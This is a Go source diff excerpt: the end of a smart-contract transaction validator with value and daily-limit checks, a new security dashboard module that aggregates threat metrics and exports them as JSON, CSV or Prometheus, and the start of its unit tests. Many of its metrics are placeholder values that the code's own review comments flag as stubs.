		return fmt.Errorf("contract does not allow value transfers: %s", tx.To().Hex())
	}
	// Per-transaction value cap (nil means no cap).
	if permissions.MaxValueWei != nil && tx.Value().Cmp(permissions.MaxValueWei) > 0 {
		return fmt.Errorf("transaction value exceeds limit: %s > %s",
			tx.Value().String(), permissions.MaxValueWei.String())
	}
	// Rolling daily spend cap per contract.
	if err := cv.checkDailyLimit(*tx.To(), tx.Value()); err != nil {
		return err
	}
	cv.logger.Debug(fmt.Sprintf("Transaction validated for contract %s", tx.To().Hex()))
	return nil
}
// checkDailyLimit enforces the per-contract daily value cap. Usage counters
// are wiped in bulk once more than 24 hours have passed since the last
// reset, and the proposed value is recorded only if it fits under the cap.
//
// NOTE(review): limits are keyed by target contract, not by sender, and the
// 24h window uses a single reset clock shared by all contracts — confirm
// that matches the intended policy.
func (cv *ContractValidator) checkDailyLimit(contractAddr common.Address, value *big.Int) error {
	cv.limitsMutex.Lock()
	defer cv.limitsMutex.Unlock()
	// Lazy daily reset: clear every counter once the window has elapsed.
	if time.Since(cv.lastResetTime) > 24*time.Hour {
		cv.dailyLimits = make(map[common.Address]*big.Int)
		cv.lastResetTime = time.Now()
	}
	// Current usage for this contract (zero-initialized on first use).
	currentUsage, exists := cv.dailyLimits[contractAddr]
	if !exists {
		currentUsage = big.NewInt(0)
		cv.dailyLimits[contractAddr] = currentUsage
	}
	// The applicable limit comes from the cached contract info; if the
	// contract was never validated/cached, no limit is enforced.
	cv.cacheMutex.RLock()
	contractInfo, exists := cv.contractCache[contractAddr]
	cv.cacheMutex.RUnlock()
	if !exists {
		return nil // No limit if contract not cached
	}
	if contractInfo.Permissions.DailyLimit == nil {
		return nil // No daily limit set
	}
	// Reject if this transaction would push usage past the cap.
	newUsage := new(big.Int).Add(currentUsage, value)
	if newUsage.Cmp(contractInfo.Permissions.DailyLimit) > 0 {
		return fmt.Errorf("daily limit exceeded for contract %s: %s + %s > %s",
			contractAddr.Hex(),
			currentUsage.String(),
			value.String(),
			contractInfo.Permissions.DailyLimit.String())
	}
	// Commit the new usage total.
	cv.dailyLimits[contractAddr] = newUsage
	return nil
}
// getDefaultValidatorConfig builds the configuration used when the caller
// passes nil: bytecode verification on, permissive whitelist policy, hourly
// cache expiry, and a maximum accepted risk score of 7.
func getDefaultValidatorConfig() *ContractValidatorConfig {
	cfg := &ContractValidatorConfig{}
	cfg.EnableBytecodeVerification = true
	cfg.EnableABIValidation = false // Requires additional infrastructure
	cfg.RequireWhitelist = false    // Start permissive, can be tightened
	cfg.MaxBytecodeSize = 50000     // 50KB
	cfg.CacheTimeout = time.Hour
	cfg.MaxRiskScore = 7 // Allow medium-high risk
	cfg.BlockUnverifiedContracts = false
	cfg.RequireSourceCode = false
	cfg.EnableRealTimeValidation = true
	return cfg
}
// GetContractInfo looks up a previously validated contract in the cache.
// The boolean result reports whether the contract was found.
func (cv *ContractValidator) GetContractInfo(address common.Address) (*ContractInfo, bool) {
	cv.cacheMutex.RLock()
	defer cv.cacheMutex.RUnlock()
	info, exists := cv.contractCache[address]
	if !exists {
		return nil, false
	}
	return info, true
}
// ListTrustedContracts returns a snapshot copy of the trusted-contract
// whitelist so callers can iterate without holding the validator's lock.
func (cv *ContractValidator) ListTrustedContracts() map[common.Address]*ContractInfo {
	cv.cacheMutex.RLock()
	defer cv.cacheMutex.RUnlock()

	snapshot := make(map[common.Address]*ContractInfo, len(cv.trustedContracts))
	for addr, info := range cv.trustedContracts {
		snapshot[addr] = info
	}
	return snapshot
}

View File

@@ -0,0 +1,702 @@
package security
import (
"encoding/json"
"fmt"
"sort"
"strings"
"time"
)
// SecurityDashboard provides comprehensive security metrics visualization
// on top of a SecurityMonitor.
type SecurityDashboard struct {
	monitor *SecurityMonitor
	config  *DashboardConfig
}

// DashboardConfig configures the security dashboard.
type DashboardConfig struct {
	RefreshInterval  time.Duration      `json:"refresh_interval"`
	AlertThresholds  map[string]float64 `json:"alert_thresholds"`
	EnabledWidgets   []string           `json:"enabled_widgets"` // sections rendered by GenerateDashboard
	HistoryRetention time.Duration      `json:"history_retention"`
	ExportFormat     string             `json:"export_format"` // json, csv, prometheus
}

// DashboardData represents the complete dashboard data structure. Sections
// whose widgets are disabled remain nil.
type DashboardData struct {
	Timestamp       time.Time            `json:"timestamp"`
	OverviewMetrics *OverviewMetrics     `json:"overview_metrics"`
	SecurityAlerts  []*SecurityAlert     `json:"security_alerts"`
	ThreatAnalysis  *ThreatAnalysis      `json:"threat_analysis"`
	PerformanceData *SecurityPerformance `json:"performance_data"`
	TrendAnalysis   *TrendAnalysis       `json:"trend_analysis"`
	TopThreats      []*ThreatSummary     `json:"top_threats"`
	SystemHealth    *SystemHealthMetrics `json:"system_health"`
}

// OverviewMetrics provides high-level security overview.
type OverviewMetrics struct {
	TotalRequests24h    int64   `json:"total_requests_24h"`
	BlockedRequests24h  int64   `json:"blocked_requests_24h"`
	SecurityScore       float64 `json:"security_score"` // 0-100
	ThreatLevel         string  `json:"threat_level"`   // LOW, MEDIUM, HIGH, CRITICAL
	ActiveThreats       int     `json:"active_threats"`
	SuccessRate         float64 `json:"success_rate"`
	AverageResponseTime float64 `json:"average_response_time_ms"`
	UptimePercentage    float64 `json:"uptime_percentage"`
}

// ThreatAnalysis provides detailed threat analysis.
type ThreatAnalysis struct {
	DDoSRisk          float64           `json:"ddos_risk"`        // 0-1
	BruteForceRisk    float64           `json:"brute_force_risk"` // 0-1
	AnomalyScore      float64           `json:"anomaly_score"`    // 0-1
	RiskFactors       []string          `json:"risk_factors"`
	MitigationStatus  map[string]string `json:"mitigation_status"`
	ThreatVectors     map[string]int64  `json:"threat_vectors"`
	GeographicThreats map[string]int64  `json:"geographic_threats"`
	AttackPatterns    []*AttackPattern  `json:"attack_patterns"`
}

// AttackPattern describes detected attack patterns.
type AttackPattern struct {
	PatternID   string    `json:"pattern_id"`
	PatternType string    `json:"pattern_type"`
	Frequency   int64     `json:"frequency"`
	Severity    string    `json:"severity"`
	FirstSeen   time.Time `json:"first_seen"`
	LastSeen    time.Time `json:"last_seen"`
	SourceIPs   []string  `json:"source_ips"`
	Confidence  float64   `json:"confidence"` // 0-1
	Description string    `json:"description"`
}

// SecurityPerformance tracks performance of security operations.
type SecurityPerformance struct {
	AverageValidationTime float64 `json:"average_validation_time_ms"`
	AverageEncryptionTime float64 `json:"average_encryption_time_ms"`
	AverageDecryptionTime float64 `json:"average_decryption_time_ms"`
	RateLimitingOverhead  float64 `json:"rate_limiting_overhead_ms"`
	MemoryUsage           int64   `json:"memory_usage_bytes"`
	CPUUsage              float64 `json:"cpu_usage_percent"`
	ThroughputPerSecond   float64 `json:"throughput_per_second"`
	ErrorRate             float64 `json:"error_rate"`
}

// TrendAnalysis provides trend analysis over time.
type TrendAnalysis struct {
	HourlyTrends map[string][]TimeSeriesPoint `json:"hourly_trends"`
	DailyTrends  map[string][]TimeSeriesPoint `json:"daily_trends"`
	WeeklyTrends map[string][]TimeSeriesPoint `json:"weekly_trends"`
	Predictions  map[string]float64           `json:"predictions"`
	GrowthRates  map[string]float64           `json:"growth_rates"`
}

// TimeSeriesPoint represents a data point in a time series.
type TimeSeriesPoint struct {
	Timestamp time.Time `json:"timestamp"`
	Value     float64   `json:"value"`
	Label     string    `json:"label,omitempty"`
}

// ThreatSummary summarizes top threats.
type ThreatSummary struct {
	ThreatType   string    `json:"threat_type"`
	Count        int64     `json:"count"`
	Severity     string    `json:"severity"`
	LastOccurred time.Time `json:"last_occurred"`
	TrendChange  float64   `json:"trend_change"` // percentage change
	Status       string    `json:"status"`       // ACTIVE, MITIGATED, MONITORING
}

// SystemHealthMetrics tracks overall system health from a security
// perspective.
type SystemHealthMetrics struct {
	SecurityComponentHealth map[string]string `json:"security_component_health"`
	KeyManagerHealth        string            `json:"key_manager_health"`
	RateLimiterHealth       string            `json:"rate_limiter_health"`
	MonitoringHealth        string            `json:"monitoring_health"`
	AlertingHealth          string            `json:"alerting_health"`
	OverallHealth           string            `json:"overall_health"`
	HealthScore             float64           `json:"health_score"` // 0-100
	LastHealthCheck         time.Time         `json:"last_health_check"`
}
// NewSecurityDashboard wires a dashboard to a security monitor. When config
// is nil, defaults are used: 30s refresh, standard alert thresholds, all
// widgets enabled, 30-day history retention, and JSON export.
func NewSecurityDashboard(monitor *SecurityMonitor, config *DashboardConfig) *SecurityDashboard {
	if config == nil {
		defaults := &DashboardConfig{
			RefreshInterval:  30 * time.Second,
			HistoryRetention: 30 * 24 * time.Hour, // 30 days
			ExportFormat:     "json",
		}
		defaults.AlertThresholds = map[string]float64{
			"blocked_requests_rate": 0.1,  // 10%
			"ddos_risk":             0.7,  // 70%
			"brute_force_risk":      0.8,  // 80%
			"anomaly_score":         0.6,  // 60%
			"error_rate":            0.05, // 5%
			"response_time_ms":      1000, // 1 second
		}
		defaults.EnabledWidgets = []string{
			"overview", "threats", "performance", "trends", "alerts", "health",
		}
		config = defaults
	}
	return &SecurityDashboard{monitor: monitor, config: config}
}
// GenerateDashboard assembles a complete DashboardData snapshot from the
// monitor's current metrics, populating only those sections whose widgets
// are enabled in the configuration.
func (sd *SecurityDashboard) GenerateDashboard() (*DashboardData, error) {
	metrics := sd.monitor.GetMetrics()
	data := &DashboardData{Timestamp: time.Now()}

	if sd.isWidgetEnabled("overview") {
		data.OverviewMetrics = sd.generateOverviewMetrics(metrics)
	}
	if sd.isWidgetEnabled("alerts") {
		data.SecurityAlerts = sd.monitor.GetRecentAlerts(50)
	}
	if sd.isWidgetEnabled("threats") {
		data.ThreatAnalysis = sd.generateThreatAnalysis(metrics)
		data.TopThreats = sd.generateTopThreats(metrics)
	}
	if sd.isWidgetEnabled("performance") {
		data.PerformanceData = sd.generatePerformanceMetrics(metrics)
	}
	if sd.isWidgetEnabled("trends") {
		data.TrendAnalysis = sd.generateTrendAnalysis(metrics)
	}
	if sd.isWidgetEnabled("health") {
		data.SystemHealth = sd.generateSystemHealth(metrics)
	}
	return data, nil
}
// generateOverviewMetrics condenses the raw security metrics into the
// high-level overview shown at the top of the dashboard.
func (sd *SecurityDashboard) generateOverviewMetrics(metrics *SecurityMetrics) *OverviewMetrics {
	requests := sd.calculateLast24HoursTotal(metrics.HourlyMetrics)
	blocked := sd.calculateLast24HoursBlocked(metrics.HourlyMetrics)

	// With no traffic at all, report a perfect success rate.
	successRate := 100.0
	if requests > 0 {
		successRate = float64(requests-blocked) / float64(requests) * 100
	}

	score := sd.calculateSecurityScore(metrics)
	return &OverviewMetrics{
		TotalRequests24h:    requests,
		BlockedRequests24h:  blocked,
		SecurityScore:       score,
		ThreatLevel:         sd.calculateThreatLevel(score),
		ActiveThreats:       sd.countActiveThreats(metrics),
		SuccessRate:         successRate,
		AverageResponseTime: sd.calculateAverageResponseTime(),
		UptimePercentage:    sd.calculateUptime(),
	}
}
// generateThreatAnalysis builds the detailed threat section: per-vector
// risk estimates, identified risk factors, mitigation status, geographic
// distribution, and detected attack patterns.
func (sd *SecurityDashboard) generateThreatAnalysis(metrics *SecurityMetrics) *ThreatAnalysis {
	analysis := &ThreatAnalysis{
		DDoSRisk:       sd.calculateDDoSRisk(metrics),
		BruteForceRisk: sd.calculateBruteForceRisk(metrics),
		AnomalyScore:   sd.calculateAnomalyScore(metrics),
		RiskFactors:    sd.identifyRiskFactors(metrics),
	}
	analysis.MitigationStatus = map[string]string{
		"rate_limiting":   "ACTIVE",
		"ip_blocking":     "ACTIVE",
		"ddos_protection": "ACTIVE",
	}
	analysis.ThreatVectors = map[string]int64{
		"ddos":          metrics.DDoSAttempts,
		"brute_force":   metrics.BruteForceAttempts,
		"sql_injection": metrics.SQLInjectionAttempts,
	}
	analysis.GeographicThreats = sd.getGeographicThreats()
	analysis.AttackPatterns = sd.detectAttackPatterns(metrics)
	return analysis
}
// generatePerformanceMetrics reports the measured overhead of the security
// subsystem (validation, crypto, rate limiting) plus resource usage and
// throughput/error figures derived from the metrics.
func (sd *SecurityDashboard) generatePerformanceMetrics(metrics *SecurityMetrics) *SecurityPerformance {
	perf := &SecurityPerformance{}
	perf.AverageValidationTime = sd.calculateValidationTime()
	perf.AverageEncryptionTime = sd.calculateEncryptionTime()
	perf.AverageDecryptionTime = sd.calculateDecryptionTime()
	perf.RateLimitingOverhead = sd.calculateRateLimitingOverhead()
	perf.MemoryUsage = sd.getMemoryUsage()
	perf.CPUUsage = sd.getCPUUsage()
	perf.ThroughputPerSecond = sd.calculateThroughput(metrics)
	perf.ErrorRate = sd.calculateErrorRate(metrics)
	return perf
}
// generateTrendAnalysis bundles hourly/daily/weekly series together with
// naive predictions and growth-rate figures.
func (sd *SecurityDashboard) generateTrendAnalysis(metrics *SecurityMetrics) *TrendAnalysis {
	trend := &TrendAnalysis{}
	trend.HourlyTrends = sd.generateHourlyTrends(metrics)
	trend.DailyTrends = sd.generateDailyTrends(metrics)
	trend.WeeklyTrends = sd.generateWeeklyTrends(metrics)
	trend.Predictions = sd.generatePredictions(metrics)
	trend.GrowthRates = sd.calculateGrowthRates(metrics)
	return trend
}
// generateTopThreats summarizes the most significant threat categories,
// ordered by occurrence count, highest first.
func (sd *SecurityDashboard) generateTopThreats(metrics *SecurityMetrics) []*ThreatSummary {
	var threats []*ThreatSummary
	threats = append(threats, &ThreatSummary{
		ThreatType:   "DDoS",
		Count:        metrics.DDoSAttempts,
		Severity:     sd.getSeverityLevel(metrics.DDoSAttempts),
		LastOccurred: time.Now().Add(-time.Hour),
		TrendChange:  sd.calculateTrendChange("ddos"),
		Status:       "MONITORING",
	})
	threats = append(threats, &ThreatSummary{
		ThreatType:   "Brute Force",
		Count:        metrics.BruteForceAttempts,
		Severity:     sd.getSeverityLevel(metrics.BruteForceAttempts),
		LastOccurred: time.Now().Add(-30 * time.Minute),
		TrendChange:  sd.calculateTrendChange("brute_force"),
		Status:       "MITIGATED",
	})
	threats = append(threats, &ThreatSummary{
		ThreatType:   "Rate Limit Violations",
		Count:        metrics.RateLimitViolations,
		Severity:     sd.getSeverityLevel(metrics.RateLimitViolations),
		LastOccurred: time.Now().Add(-5 * time.Minute),
		TrendChange:  sd.calculateTrendChange("rate_limit"),
		Status:       "ACTIVE",
	})

	// Highest counts first.
	sort.Slice(threats, func(a, b int) bool {
		return threats[a].Count > threats[b].Count
	})
	return threats
}
// generateSystemHealth reports component-level health plus an aggregate
// score and status. Component statuses are currently static placeholders;
// only the overall score is derived from live metrics.
func (sd *SecurityDashboard) generateSystemHealth(metrics *SecurityMetrics) *SystemHealthMetrics {
	score := sd.calculateOverallHealthScore(metrics)

	health := &SystemHealthMetrics{
		KeyManagerHealth:  "HEALTHY",
		RateLimiterHealth: "HEALTHY",
		MonitoringHealth:  "HEALTHY",
		AlertingHealth:    "HEALTHY",
		OverallHealth:     sd.getHealthStatus(score),
		HealthScore:       score,
		LastHealthCheck:   time.Now(),
	}
	health.SecurityComponentHealth = map[string]string{
		"encryption":     "HEALTHY",
		"authentication": "HEALTHY",
		"authorization":  "HEALTHY",
		"audit_logging":  "HEALTHY",
	}
	return health
}
// ExportDashboard generates the dashboard and serializes it in the given
// format: "json", "csv", or "prometheus".
func (sd *SecurityDashboard) ExportDashboard(format string) ([]byte, error) {
	dashboard, err := sd.GenerateDashboard()
	if err != nil {
		return nil, fmt.Errorf("failed to generate dashboard: %w", err)
	}
	switch format {
	case "prometheus":
		return sd.exportToPrometheus(dashboard)
	case "csv":
		return sd.exportToCSV(dashboard)
	case "json":
		return json.MarshalIndent(dashboard, "", "  ")
	}
	return nil, fmt.Errorf("unsupported export format: %s", format)
}
// Helper methods for calculations

// isWidgetEnabled reports whether the named widget appears in the
// configured EnabledWidgets list.
func (sd *SecurityDashboard) isWidgetEnabled(widget string) bool {
	for i := range sd.config.EnabledWidgets {
		if sd.config.EnabledWidgets[i] == widget {
			return true
		}
	}
	return false
}
// calculateLast24HoursTotal sums the hourly request counters for the 24
// hour-buckets ending now. Bucket keys use the "YYYYMMDDHH" layout.
func (sd *SecurityDashboard) calculateLast24HoursTotal(hourlyMetrics map[string]int64) int64 {
	now := time.Now()
	var total int64
	for i := 0; i < 24; i++ {
		key := now.Add(-time.Duration(i) * time.Hour).Format("2006010215")
		total += hourlyMetrics[key] // missing buckets contribute zero
	}
	return total
}
// calculateLast24HoursBlocked estimates the number of blocked requests in
// the last 24 hours.
// NOTE(review): blocked counts are not tracked per hour yet, so this
// returns a flat 10% of total traffic — replace once hourly blocked
// metrics exist.
func (sd *SecurityDashboard) calculateLast24HoursBlocked(hourlyMetrics map[string]int64) int64 {
	// This would require tracking blocked requests in hourly metrics
	// For now, return a calculated estimate
	return sd.calculateLast24HoursTotal(hourlyMetrics) / 10 // Assume 10% blocked
}
// calculateSecurityScore derives a 0-100 score, starting at 100 and
// subtracting weighted penalties per observed threat event
// (DDoS 0.1/event, brute force 0.2/event, rate-limit violation 0.05/event).
func (sd *SecurityDashboard) calculateSecurityScore(metrics *SecurityMetrics) float64 {
	score := 100.0
	if metrics.DDoSAttempts > 0 {
		score -= float64(metrics.DDoSAttempts) * 0.1
	}
	if metrics.BruteForceAttempts > 0 {
		score -= float64(metrics.BruteForceAttempts) * 0.2
	}
	if metrics.RateLimitViolations > 0 {
		score -= float64(metrics.RateLimitViolations) * 0.05
	}
	// Clamp into [0, 100].
	switch {
	case score < 0:
		score = 0
	case score > 100:
		score = 100
	}
	return score
}
// calculateThreatLevel maps a security score onto a threat-level label:
// >=90 LOW, >=70 MEDIUM, >=50 HIGH, otherwise CRITICAL.
func (sd *SecurityDashboard) calculateThreatLevel(securityScore float64) string {
	switch {
	case securityScore >= 90:
		return "LOW"
	case securityScore >= 70:
		return "MEDIUM"
	case securityScore >= 50:
		return "HIGH"
	default:
		return "CRITICAL"
	}
}
// countActiveThreats counts how many threat categories currently show
// activity: any DDoS attempts, any brute-force attempts, or more than ten
// rate-limit violations.
func (sd *SecurityDashboard) countActiveThreats(metrics *SecurityMetrics) int {
	active := 0
	for _, triggered := range []bool{
		metrics.DDoSAttempts > 0,
		metrics.BruteForceAttempts > 0,
		metrics.RateLimitViolations > 10,
	} {
		if triggered {
			active++
		}
	}
	return active
}
// calculateAverageResponseTime returns the average response time in
// milliseconds. Stubbed: response-time tracking is not wired in yet.
func (sd *SecurityDashboard) calculateAverageResponseTime() float64 {
	// This would require tracking response times
	// Return a placeholder value
	return 150.0 // 150ms
}

// calculateUptime returns the service uptime percentage. Stubbed: uptime
// tracking is not wired in yet.
func (sd *SecurityDashboard) calculateUptime() float64 {
	// This would require tracking uptime
	// Return a placeholder value
	return 99.9
}
// calculateDDoSRisk maps the DDoS attempt count onto a 0-1 risk value,
// scaling linearly and saturating at 1.0 once 1000 attempts are reached.
func (sd *SecurityDashboard) calculateDDoSRisk(metrics *SecurityMetrics) float64 {
	attempts := metrics.DDoSAttempts
	if attempts == 0 {
		return 0.0
	}
	if attempts >= 1000 {
		return 1.0
	}
	return float64(attempts) / 1000.0
}
// calculateBruteForceRisk maps the brute-force attempt count onto a 0-1
// risk value, scaling linearly and saturating at 1.0 at 500 attempts.
func (sd *SecurityDashboard) calculateBruteForceRisk(metrics *SecurityMetrics) float64 {
	attempts := metrics.BruteForceAttempts
	if attempts == 0 {
		return 0.0
	}
	if attempts >= 500 {
		return 1.0
	}
	return float64(attempts) / 500.0
}
// calculateAnomalyScore returns the blocked-to-total request ratio as a
// simple 0-1 anomaly indicator (0 when there has been no traffic).
func (sd *SecurityDashboard) calculateAnomalyScore(metrics *SecurityMetrics) float64 {
	total := metrics.TotalRequests
	if total == 0 {
		return 0.0
	}
	return float64(metrics.BlockedRequests) / float64(total)
}
// identifyRiskFactors collects human-readable descriptions of every metric
// that currently exceeds its alerting threshold. Returns an empty (non-nil)
// slice when nothing is elevated.
func (sd *SecurityDashboard) identifyRiskFactors(metrics *SecurityMetrics) []string {
	checks := []struct {
		triggered bool
		message   string
	}{
		{metrics.DDoSAttempts > 10, "High DDoS activity"},
		{metrics.BruteForceAttempts > 5, "Brute force attacks detected"},
		{metrics.RateLimitViolations > 100, "Excessive rate limit violations"},
		{metrics.FailedKeyAccess > 10, "Multiple failed key access attempts"},
	}
	factors := []string{}
	for _, c := range checks {
		if c.triggered {
			factors = append(factors, c.message)
		}
	}
	return factors
}
// Additional helper methods...

// getGeographicThreats returns threat counts keyed by country code.
// Stubbed with fixed sample data: real values require a GeoIP integration.
func (sd *SecurityDashboard) getGeographicThreats() map[string]int64 {
	// Placeholder - would integrate with GeoIP service
	return map[string]int64{
		"US":      5,
		"CN":      15,
		"RU":      8,
		"Unknown": 3,
	}
}
// detectAttackPatterns derives coarse attack-pattern records from the
// aggregated counters. Currently only a DDoS pattern is emitted, with
// illustrative source IPs and timing.
func (sd *SecurityDashboard) detectAttackPatterns(metrics *SecurityMetrics) []*AttackPattern {
	patterns := []*AttackPattern{}
	if metrics.DDoSAttempts == 0 {
		return patterns
	}
	ddos := &AttackPattern{
		PatternID:   "ddos-001",
		PatternType: "DDoS",
		Frequency:   metrics.DDoSAttempts,
		Severity:    "HIGH",
		FirstSeen:   time.Now().Add(-2 * time.Hour),
		LastSeen:    time.Now().Add(-5 * time.Minute),
		SourceIPs:   []string{"192.168.1.100", "10.0.0.5"},
		Confidence:  0.95,
		Description: "Distributed denial of service attack pattern",
	}
	return append(patterns, ddos)
}
// The helpers below return fixed placeholder values.
// NOTE(review): wire these to real instrumentation before relying on the
// performance widget.

// calculateValidationTime returns the average validation latency in ms (stub).
func (sd *SecurityDashboard) calculateValidationTime() float64 {
	return 5.2 // 5.2ms average
}

// calculateEncryptionTime returns the average encryption latency in ms (stub).
func (sd *SecurityDashboard) calculateEncryptionTime() float64 {
	return 12.1 // 12.1ms average
}

// calculateDecryptionTime returns the average decryption latency in ms (stub).
func (sd *SecurityDashboard) calculateDecryptionTime() float64 {
	return 8.7 // 8.7ms average
}

// calculateRateLimitingOverhead returns the rate-limiter overhead in ms (stub).
func (sd *SecurityDashboard) calculateRateLimitingOverhead() float64 {
	return 2.3 // 2.3ms overhead
}

// getMemoryUsage returns the security subsystem's memory footprint in bytes (stub).
func (sd *SecurityDashboard) getMemoryUsage() int64 {
	return 1024 * 1024 * 64 // 64MB
}

// getCPUUsage returns the CPU usage percentage (stub).
func (sd *SecurityDashboard) getCPUUsage() float64 {
	return 15.5 // 15.5%
}
// calculateThroughput approximates requests per second by spreading the
// request total over one hour.
// NOTE(review): TotalRequests appears to be a cumulative counter, not a
// one-hour window, so this figure is only a rough proxy — confirm the
// counter's semantics.
func (sd *SecurityDashboard) calculateThroughput(metrics *SecurityMetrics) float64 {
	// Calculate requests per second
	return float64(metrics.TotalRequests) / 3600.0 // requests per hour / 3600
}
// calculateErrorRate returns blocked requests as a percentage of total
// requests, or 0 when there has been no traffic.
func (sd *SecurityDashboard) calculateErrorRate(metrics *SecurityMetrics) float64 {
	total := metrics.TotalRequests
	if total == 0 {
		return 0.0
	}
	return float64(metrics.BlockedRequests) / float64(total) * 100
}
// generateHourlyTrends builds the per-hour request series for the last 24
// hours, oldest bucket first. Hours with no recorded metric appear with a
// zero value, so the series always has exactly 24 points.
func (sd *SecurityDashboard) generateHourlyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
	now := time.Now()
	// Preallocate the series once instead of re-checking and re-assigning
	// the map entry on every iteration as the previous version did.
	points := make([]TimeSeriesPoint, 0, 24)
	for i := 23; i >= 0; i-- {
		timestamp := now.Add(-time.Duration(i) * time.Hour)
		// Bucket keys use the "YYYYMMDDHH" layout; a missing bucket reads
		// as zero from the map.
		value := float64(metrics.HourlyMetrics[timestamp.Format("2006010215")])
		points = append(points, TimeSeriesPoint{
			Timestamp: timestamp,
			Value:     value,
		})
	}
	return map[string][]TimeSeriesPoint{"requests": points}
}
// generateDailyTrends builds the per-day request series for the last 30
// days, oldest bucket first. Days with no recorded metric appear with a
// zero value, so the series always has exactly 30 points.
func (sd *SecurityDashboard) generateDailyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
	now := time.Now()
	// Preallocate the series once instead of re-checking and re-assigning
	// the map entry on every iteration as the previous version did.
	points := make([]TimeSeriesPoint, 0, 30)
	for i := 29; i >= 0; i-- {
		timestamp := now.Add(-time.Duration(i) * 24 * time.Hour)
		// Bucket keys use the "YYYYMMDD" layout; a missing bucket reads as
		// zero from the map.
		value := float64(metrics.DailyMetrics[timestamp.Format("20060102")])
		points = append(points, TimeSeriesPoint{
			Timestamp: timestamp,
			Value:     value,
		})
	}
	return map[string][]TimeSeriesPoint{"daily_requests": points}
}
// generateWeeklyTrends will aggregate daily data into weekly buckets; it is
// currently a stub that always returns an empty (non-nil) map.
func (sd *SecurityDashboard) generateWeeklyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
	trends := make(map[string][]TimeSeriesPoint)
	// Placeholder - would aggregate daily data into weekly
	return trends
}
// generatePredictions produces naive forward-looking estimates: +5%
// request growth, -10% threat volume, and a fixed capacity figure.
func (sd *SecurityDashboard) generatePredictions(metrics *SecurityMetrics) map[string]float64 {
	predictions := make(map[string]float64, 3)
	predictions["next_hour_requests"] = float64(metrics.TotalRequests) * 1.05
	predictions["next_day_threats"] = float64(metrics.DDoSAttempts+metrics.BruteForceAttempts) * 0.9
	predictions["capacity_utilization"] = 75.0
	return predictions
}
// calculateGrowthRates returns period-over-period growth percentages.
// Stubbed with fixed figures until historical comparison data exists.
func (sd *SecurityDashboard) calculateGrowthRates(metrics *SecurityMetrics) map[string]float64 {
	rates := make(map[string]float64, 3)
	rates["requests_growth"] = 5.2            // 5.2% growth
	rates["threats_growth"] = -12.1           // -12.1% (declining)
	rates["performance_improvement"] = 8.5    // 8.5% improvement
	return rates
}
// getSeverityLevel buckets an event count into a severity label:
// 0 NONE, <10 LOW, <50 MEDIUM, <100 HIGH, otherwise CRITICAL.
func (sd *SecurityDashboard) getSeverityLevel(count int64) string {
	switch {
	case count == 0:
		return "NONE"
	case count < 10:
		return "LOW"
	case count < 50:
		return "MEDIUM"
	case count < 100:
		return "HIGH"
	default:
		return "CRITICAL"
	}
}
// calculateTrendChange returns the percentage change in activity for the
// given threat type. Stubbed: always returns a fixed -5.2% until trend
// history is tracked.
func (sd *SecurityDashboard) calculateTrendChange(threatType string) float64 {
	// Placeholder - would calculate actual trend change
	return -5.2 // -5.2% change
}
// calculateOverallHealthScore starts at 100 and subtracts fixed penalties:
// 20 points when more than 10% of requests were blocked, 15 points when
// key-access failures exceed five.
func (sd *SecurityDashboard) calculateOverallHealthScore(metrics *SecurityMetrics) float64 {
	var deductions float64
	// A high block rate indicates systemic trouble.
	if metrics.BlockedRequests > metrics.TotalRequests/10 {
		deductions += 20
	}
	// Repeated key-access failures point to credential problems.
	if metrics.FailedKeyAccess > 5 {
		deductions += 15
	}
	return 100.0 - deductions
}
// getHealthStatus maps a numeric health score onto a status label:
// >=90 HEALTHY, >=70 WARNING, >=50 DEGRADED, otherwise CRITICAL.
func (sd *SecurityDashboard) getHealthStatus(score float64) string {
	switch {
	case score >= 90:
		return "HEALTHY"
	case score >= 70:
		return "WARNING"
	case score >= 50:
		return "DEGRADED"
	default:
		return "CRITICAL"
	}
}
// exportToCSV renders the dashboard's overview metrics as a small CSV
// document with a Metric,Value,Timestamp header. Only the overview section
// is exported; the error return is reserved for future use and is
// currently always nil.
func (sd *SecurityDashboard) exportToCSV(dashboard *DashboardData) ([]byte, error) {
	var b strings.Builder
	b.WriteString("Metric,Value,Timestamp\n")

	if overview := dashboard.OverviewMetrics; overview != nil {
		// One shared timestamp keeps the rows consistent.
		ts := dashboard.Timestamp.Format(time.RFC3339)
		fmt.Fprintf(&b, "TotalRequests24h,%d,%s\n", overview.TotalRequests24h, ts)
		fmt.Fprintf(&b, "BlockedRequests24h,%d,%s\n", overview.BlockedRequests24h, ts)
		fmt.Fprintf(&b, "SecurityScore,%.2f,%s\n", overview.SecurityScore, ts)
	}
	return []byte(b.String()), nil
}
// exportToPrometheus renders the dashboard's overview metrics in the
// Prometheus text exposition format (# HELP / # TYPE headers followed by
// a sample line). Only the overview section is exported; the error return
// is reserved for future use and is currently always nil.
func (sd *SecurityDashboard) exportToPrometheus(dashboard *DashboardData) ([]byte, error) {
	var promData strings.Builder
	if dashboard.OverviewMetrics != nil {
		// Constant header lines need no formatting; writing them directly
		// removes the pointless fmt.Sprintf round trips the original had
		// (flagged by staticcheck as S1039).
		promData.WriteString("# HELP security_requests_total Total number of requests in last 24h\n")
		promData.WriteString("# TYPE security_requests_total counter\n")
		fmt.Fprintf(&promData, "security_requests_total %d\n", dashboard.OverviewMetrics.TotalRequests24h)
		promData.WriteString("# HELP security_score Current security score (0-100)\n")
		promData.WriteString("# TYPE security_score gauge\n")
		fmt.Fprintf(&promData, "security_score %.2f\n", dashboard.OverviewMetrics.SecurityScore)
	}
	return []byte(promData.String()), nil
}

View File

@@ -0,0 +1,390 @@
package security
import (
"encoding/json"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
// TestNewSecurityDashboard verifies constructor behavior with both the
// default (nil) configuration — which must fall back to a 30s refresh
// interval — and a caller-supplied custom configuration.
func TestNewSecurityDashboard(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts:    true,
		AlertBuffer:     1000,
		MaxEvents:       1000,
		CleanupInterval: time.Hour,
		MetricsInterval: 30 * time.Second,
	})
	// Test with default config
	dashboard := NewSecurityDashboard(monitor, nil)
	assert.NotNil(t, dashboard)
	assert.NotNil(t, dashboard.config)
	assert.Equal(t, 30*time.Second, dashboard.config.RefreshInterval)
	// Test with custom config
	customConfig := &DashboardConfig{
		RefreshInterval: time.Minute,
		AlertThresholds: map[string]float64{
			"test_metric": 0.5,
		},
		EnabledWidgets: []string{"overview"},
